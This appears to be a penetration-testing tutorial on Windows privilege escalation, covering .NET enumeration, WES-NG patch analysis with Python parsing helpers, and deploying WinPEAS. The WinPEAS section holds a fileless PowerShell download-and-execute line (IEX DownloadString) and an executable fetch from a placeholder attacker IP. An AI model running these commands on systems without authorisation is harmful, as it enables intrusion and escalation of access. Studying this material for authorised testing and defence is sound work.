Windows Privilege Escalation

Windows Privilege Escalation is the process of elevating access from a low-privilege user (like a standard user) to a higher-privilege user (such as Administrator or NT AUTHORITY\SYSTEM).

Initial Enumeration

Before running any automated tools, get a feel for the system. A key piece of information is the installed .NET Framework version, as this determines which tools (like WinPEAS) will run natively.

c:\Users>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"  
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"  
  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

The output will list the installed versions. If you see v4.5 or higher, you can likely run modern .NET executables. If you only see older versions (v2.0, v3.5), you may need to rely on PowerShell v2, batch scripts, or older compiled tools.
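To turn that registry listing into a decision about which WinPEAS variant can run, here is an added Python helper (not part of the original page or of WinPEAS) that parses the `reg query` output, extracts the NDP version subkeys and maps the highest one to a tool choice. The sample output is constructed to match the listing above; the function and variable names are my own.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample: what `reg query` prints for the NDP key on a host with
# only .NET 2.0/3.0/3.5 (mirrors the listing above; not captured from a real box).
SAMPLE_REG_OUTPUT = r"""
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5
"""

# Matches only the version subkeys (v2.0.50727, v3.5, v4 ...), not the echoed command.
NDP_KEY_RE = re.compile(
    r"NET Framework Setup\\NDP\\v(\d+(?:\.\d+)*)\s*$",
    re.IGNORECASE | re.MULTILINE,
)

Version = Tuple[int, ...]


def parse_ndp_versions(reg_output: str) -> List[Version]:
    """Return the NDP version subkeys as sorted integer tuples, e.g. (3, 5)."""
    found = set()
    for m in NDP_KEY_RE.finditer(reg_output):
        found.add(tuple(int(part) for part in m.group(1).split(".")))
    return sorted(found)


def highest_version(versions: List[Version]) -> Optional[Version]:
    return max(versions) if versions else None


def recommended_variant(versions: List[Version]) -> str:
    """Map the highest listed subkey to the WinPEAS build that can run natively.

    A bare 'v4' subkey only proves some 4.x runtime is present; whether it is
    4.5.2 or newer must be confirmed from the Release value under v4\\Full.
    """
    top = highest_version(versions)
    if top is None:
        return "winPEAS.bat"  # no .NET at all: the batch script has no dependencies
    if top >= (4,):
        return "winPEASx64.exe / winPEASx86.exe (confirm 4.5.2+ via v4\\Full Release value)"
    return "winPEAS.bat or winPEAS.ps1 under PowerShell v2"


if __name__ == "__main__":
    versions = parse_ndp_versions(SAMPLE_REG_OUTPUT)
    print("installed NDP subkeys:", versions)
    print("recommended variant:", recommended_variant(versions))
```

On a host that lists a `v4` subkey, the key name alone does not distinguish 4.0 from 4.5.2 or 4.8; Microsoft stores that in the `Release` DWORD under `NDP\v4\Full`, so query that value before assuming the .exe build will start.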

Windows Exploit Suggester - Next Generation (WES-NG)

WES-NG is an offline Python script that identifies missing security patches that could lead to privilege escalation. It works by comparing the output of the Windows systeminfo command against its own updated database of Microsoft vulnerabilities. It's a great first step because it doesn't run any code on the target machine besides the built-in systeminfo.

On the target machine, generate the system information file and copy it to the attacker machine:

C:\Users\user> systeminfo > systeminfo.txt

On the attacker machine

Method 01:

#Clone the repository
git clone https://github.com/bitsadmin/wesng.git
cd wesng

#(Optional but recommended) Create a Python virtual environment

python -m venv venv
source venv/bin/activate

#Install requirement and update WES-NG's vulnerability database
pip install chardet
python wes.py --update

#Run WES-NG against the systeminfo file
python wes.py ../systeminfo.txt -o ../wes-output.csv

Method 02:

#Install wesng globally
pipx install wesng

#Install the chardet requirement into the wesng environment (chardet is a library, not an app, so `pipx install chardet` would fail)
pipx inject wesng chardet

#Update WES-NG's vulnerability database
wes --update

#Run WES-NG against the systeminfo file
wes systeminfo.txt -o wes-output.csv

What to look for in the output:

WES-NG will provide a list of vulnerabilities (CVEs) and their corresponding Microsoft Knowledge Base (KB) numbers.

[+] CVE-2019-0859, KB4500331
    Name: Windows Win32k/USER32 Uninitialized Use-After-Free Privilege Escalation Vulnerability
    [...]
    Exploit: https://www.exploit-db.com/exploits/46797/
    [...]

  • Focus on exploits with public code: Look for entries that have a known Exploit-DB link or a GitHub repository.
  • Check for reliability: Not all public exploits are stable. Read the exploit code or description to see if it's reliable or might crash the system.
  • False Positives: WES-NG can have false positives. It suggests vulnerabilities based on the OS build number but can't confirm if a specific patch has been applied manually. Always treat its output as a suggestion, not a guarantee.
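The triage rules above (public exploit first, then severity, and treat every hit as a suggestion) are easy to apply by script once WES-NG has written its CSV. The following Python is an added example, not WES-NG's own code: it loads the export, orders findings for review and groups them by the KB that closes them, which is the patch backlog a defender actually works from. The column names are assumed from WES-NG's CSV export (adjust if yours differ); the sample rows are constructed, reusing only the CVE/KB pair shown above and placeholder identifiers elsewhere.

```python
import csv
import io
from typing import Dict, List, Optional, Set

# Constructed sample in the column layout WES-NG writes with -o (assumed header
# names). Row 1 reuses the CVE/KB pair shown above; the others are placeholders.
SAMPLE_CSV = """DatePosted,CVE,KB,Title,AffectedProduct,AffectedComponent,Severity,Impact,Exploits
20190409,CVE-2019-0859,KB4500331,Windows Win32k/USER32 Uninitialized Use-After-Free Privilege Escalation Vulnerability,Windows 7 for x64-based Systems Service Pack 1,,Important,Elevation of Privilege,https://www.exploit-db.com/exploits/46797/
20190409,CVE-0000-0001,KB0000001,Placeholder critical RCE (constructed),Windows 7 for x64-based Systems Service Pack 1,,Critical,Remote Code Execution,
20190409,CVE-0000-0002,KB0000002,Placeholder EoP without public exploit (constructed),Windows 7 for x64-based Systems Service Pack 1,,Important,Elevation of Privilege,
20190409,CVE-0000-0003,KB4500331,Placeholder EoP fixed by the same KB (constructed),Windows 7 for x64-based Systems Service Pack 1,,Moderate,Elevation of Privilege,
"""

# Microsoft severity ratings, most urgent first; unknown strings sort last.
SEVERITY_RANK = {"Critical": 0, "Important": 1, "Moderate": 2, "Low": 3}


def load_findings(csv_text: str) -> List[Dict[str, str]]:
    """Parse a WES-NG CSV export into one dict per finding."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def has_public_exploit(row: Dict[str, str]) -> bool:
    """True when WES-NG listed at least one exploit URL for the finding."""
    return bool(row.get("Exploits", "").strip())


def prioritize(findings: List[Dict[str, str]],
               impact_filter: Optional[str] = None) -> List[Dict[str, str]]:
    """Order findings for review: public exploit first, then severity, then CVE.

    impact_filter keeps only one Impact class, e.g. 'Elevation of Privilege'.
    """
    rows = [r for r in findings
            if impact_filter is None or r.get("Impact") == impact_filter]
    return sorted(rows, key=lambda r: (not has_public_exploit(r),
                                       SEVERITY_RANK.get(r.get("Severity", ""), 99),
                                       r["CVE"]))


def missing_kbs(findings: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Group CVEs by the KB that fixes them: one install often closes several."""
    backlog: Dict[str, Set[str]] = {}
    for r in findings:
        backlog.setdefault(r["KB"], set()).add(r["CVE"])
    return backlog


if __name__ == "__main__":
    findings = load_findings(SAMPLE_CSV)
    for r in prioritize(findings):
        flag = "EXPLOIT" if has_public_exploit(r) else "       "
        print(f"{flag} {r['Severity']:<9} {r['CVE']} {r['KB']} {r['Impact']}")
    for kb, cves in sorted(missing_kbs(findings).items()):
        print(f"{kb}: {', '.join(sorted(cves))}")
```

Because WES-NG infers findings from the build number, verify each KB in the backlog against the host's installed updates (for example `wmic qfe list` or `Get-HotFix`) before treating a row as confirmed.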

WinPEAS

WinPEAS is a script that automatically searches for a wide range of privilege escalation vectors on a Windows system. Unlike WES-NG, which only looks for missing patches, WinPEAS checks for misconfigurations, stored credentials, weak permissions, and much more. It is very loud and should only be used when stealth is not a concern.

How to Use

On the attacker machine, download the appropriate version of WinPEAS.

  • winPEASx64.exe / winPEASx86.exe: The best option if the target has the required .NET Framework (v4.5.2+) and antivirus is not aggressively blocking it.
  • winPEAS.bat: A batch script version. It is less comprehensive but has no dependencies, making it a great fallback for older systems or when .NET is not available.
  • winPEAS.ps1: The PowerShell version. Useful for environments with execution restrictions or for running fileless/in-memory.

#Download the files (the GitHub tree URLs only return HTML; use the release asset for the .exe and the raw files for the .bat and .ps1)
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe #(.Net >= 4.5.2 required)
wget https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1
wget https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat

#Start an HTTP server to host the files
sudo python3 -m http.server 8001

On target machine

Choose one of the following methods to download and run WinPEAS on the target.

PowerShell

#This downloads and executes the script without writing it to disk
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/winPEAS.ps1')"

EXE file

# Download the file
powershell -c "Invoke-WebRequest -Uri 'http://<ATTACKER_IP>:<PORT>/winPEASx64.exe' -OutFile 'C:\Windows\Temp\winpeas.exe'"

# Run it
C:\Windows\Temp\winpeas.exe